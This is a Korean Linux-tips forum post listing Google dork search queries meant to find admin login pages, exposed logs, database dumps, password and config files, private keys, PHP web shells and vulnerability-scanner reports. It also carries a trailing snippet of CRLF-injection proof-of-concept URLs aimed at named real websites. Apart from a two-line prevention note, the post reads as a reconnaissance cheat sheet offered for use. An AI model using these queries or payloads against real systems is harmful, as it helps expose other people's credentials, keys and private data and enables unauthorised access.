* 39.117.243.43 *
| Home | Profile | Linux | 자료실 | zabbix | Mysql 5.6 | 갤러리 | 성경검색 | 해피니스 | 자유게시판 | 게시물검색 | L | O | R |
[기초강좌] 구글 검색 옵션
작성자 : rootmanDate : 2007-02-07 09:39 | Hit : 729,786
---------------------------------------------
facebook 관련글 검색
---------------------------------------------
키워드 + space + site:facebook.com
키워드 + spcae + site:facebook.com/pages
키워드 + spcae + site:facebook.com/group
키워드 + spcae + site:facebook.com/profile
---------------------------------------------
로그 파일
---------------------------------------------
db filetype:log
intitle:"index of" intext:(backup|백업|bak|dump)
---------------------------------------------
로그인
---------------------------------------------
로그인
inurl:/admin filetype:php
inurl:/admin filetype:asp
"VNC Desktop" inurl:5800
intitle:"원격 데스크톱 웹 연결" inurl:tsweb
intitle:관리자 로그인
intitle:"인트라넷"
intitle:"intranet"
intitle:"직원용
intitle:"사내" intext:로그인"
---------------------------------------------
패스워드 파일
---------------------------------------------
intext:mysql_connect+pass
intext:mysql_connect filetype:bak
inurl:"/level/*/exec/" intext:password
intitle:index.of intext:sc_serv_gui.ini
filetype:ini wcx_ftp
intitle:index.of ws_ftp.ini
intitle:technote inurl:cgi-bin
---------------------------------------------
해킹 파일 검색
---------------------------------------------
intitle:"PHP Shell *" intext:Command filetype:php
---------------------------------------------
해킹 파일 검색
---------------------------------------------
inurl:/_vti_bin/shtml.exe
inurl:/cgi-bin/finger
inurl:cgi-bin/guestbook.pl
inurl:/_vti_pvt/admin.pwd
inurl:/phpBB/search.php
inurl:/zeroboard/login.php
inurl:/cgi-bin/14all.cgi
---------------------------------------------
민감한 데이터
---------------------------------------------
intitle:index.of .bash_history or index.of .sh_history
allintext:대외비
---------------------------------------------
포트 스캐너
---------------------------------------------
"VNC Desktop" inurl:5800
inurl:":10000" intext:webmin
inurl:8080 -inurl:board -intext:8080 or inurl:8000 -inurl:board -intext:8000
intitle:"Network query tool" filetype:php or inurl:nqt.php
---------------------------------------------
SQL 데이터 수집
---------------------------------------------
"access denied for user" "using password"
"access denied for user" "using password" site:co.kr
"# Dumping data for table"
"# Dumping data for table" username password
"# Dumping data for table(username|user|pass|password|passwd)"
"ORA-00933: SQL command not properly ended"
"Unclosed quotation mark before the character string"
intitle:"에러" "에러 발생" filetype:asp
intitle:"Error" "에러 발생" filetype:asp
Mysql error message: "supplied argument"
inurl:main.php3 Welcome to phpMyAdmin site:co.kr
filetype:sql+"IDENTIFIED BY" -cvs or filetype:dmp+"IDENTIFIED BY" -cvs
filetype:"(sql|dmp|dump|inc)" password
filetype:mdb inurl:users.mdb
"Warning:pg_connet(): Unalbe to connect to PostgreSQL server:FATAL"
filetype:ldb admin inurl:db intext:password filetype:sql
filetype:"(sql|dmp|dump|inc)" password
inurl:config.php dbuname dbpass
inurl:nuke filetype:sql -cvs
filetype:inc intext:mysql_connect
filetype:inc dbconn site:kr
---------------------------------------------
인증서
---------------------------------------------
BEGIN(CERTIFICATE|RSA|DEA) filetype:key, or filetype:cer or filetype:der
filetype:pem PRIVATE -cvs
---------------------------------------------
취약점 스캐너
---------------------------------------------
"This file was generated by Nessus" -site:ihackstuff.com
"This file was generated by Network Security Scanner" site:co.kr
intext:"QualysGuard" -site:qualys.com
intitle"X-Scan Report" intext:"This file was generated by X-Scan"
"Network Vulnerability Assessment Report"
---------------------------------------------
침입탐지 데이터
---------------------------------------------
ACID "by Roman Danyliw" filetype:php
---------------------------------------------
SSH Key
---------------------------------------------
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
---------------------------------------------
IRC
---------------------------------------------
filetype:cgi "cgi:irc"
filetype:conf inurl:psybnc.conv "USER.PASS="
---------------------------------------------
방어(Prevention)
---------------------------------------------
1. Googledork Prevention
Googledork Prevention(FoundStone, Inc. SiteDigger)
2. 자동 검색 툴을 이용한 방어
(GoogleAlert, Inc. http://www.googlealert.com)
(gooscan http://johnny.ihackstuff.com)
Total. 197
번호 분류 제목 작성자 등록일 조회수
122 기초강좌
아파치 로그 파일 - 특이한 녀석들은 따로 담거나 없애기
rootman
06-30 6545
121 기초강좌
Linux /proc/pid/stat 구조
rootman
06-30 8466
120 기초강좌
e2fsck 를 이용한 파일시스템 무결성 점검
rootman
06-12 6172
119 기초강좌
grep 검색어에 highlight 주기
rootman
04-22 5597
118 기초강좌
nfs 사용하기
rootman
04-10 8085
117 기초강좌
ssh 패스워드 없이 로그인하기
rootman
01-28 9411
116 기초강좌
하드디스크 온도 측정하기(smartctl 이용)
rootman
12-31 7590
115 기초강좌
[HTML] HTML에서 사용하는 주요 메타테그
rootman
12-10 6229
114 기초강좌
[BMT] bonnie++를 통한 시스템 벤치마킹(BMT Tool)
rootman
11-24 17681
113 기초강좌
[vim] /etc/vimrc 설정 파일
rootman
11-12 6855
112 기초강좌
커널에 모듈 추가
rootman
11-05 5861
111 기초강좌
CentOS에서 smtp relay 제공하기
rootman
06-05 6552
110 기초강좌
파일시스템 관련명령어
rootman
05-24 8938
109 기초강좌
ramdisk 이용하기
rootman
03-02 9629
108 기초강좌
구글 검색 옵션
rootman
02-07 729787
처음 1 2 3 4 5 6 7 8 9 10 다음 맨끝
제출 AND OR
2. googlehackking
https://m.blog.naver.com/ppp7009/70153191675
이 문서는 HackerOne 에서 제출된 많은 보고서들을 토대로 핵심 Payload만 요약하여 직접 작성하였습니다. Link : https://hackerone.com/ Vulnerabilities list 1. CRLF Injection 2. Open Redirection 3. Cross-Site-Scripting 4. SQL-Injection 5. Path Traversal CRLF Injection PoC http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com; https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com; HTTP Response: HTTP/1.1 302 Moved Temporarily ... Location: http://myshopify.com/xxcrlftest Set-Cookie:test=test;domain=.myshopify.com; PoC: https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com HTTP Response: HTTP/1.1 301 Moved Permanently ... Location: http://engineeringblog.yelp.com/xxcrlftest Set-Cookie: test=test;domain=.yelp.com PoC (Chrome, Internet Explorer) http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; HTTP Resp...
댓글
댓글 쓰기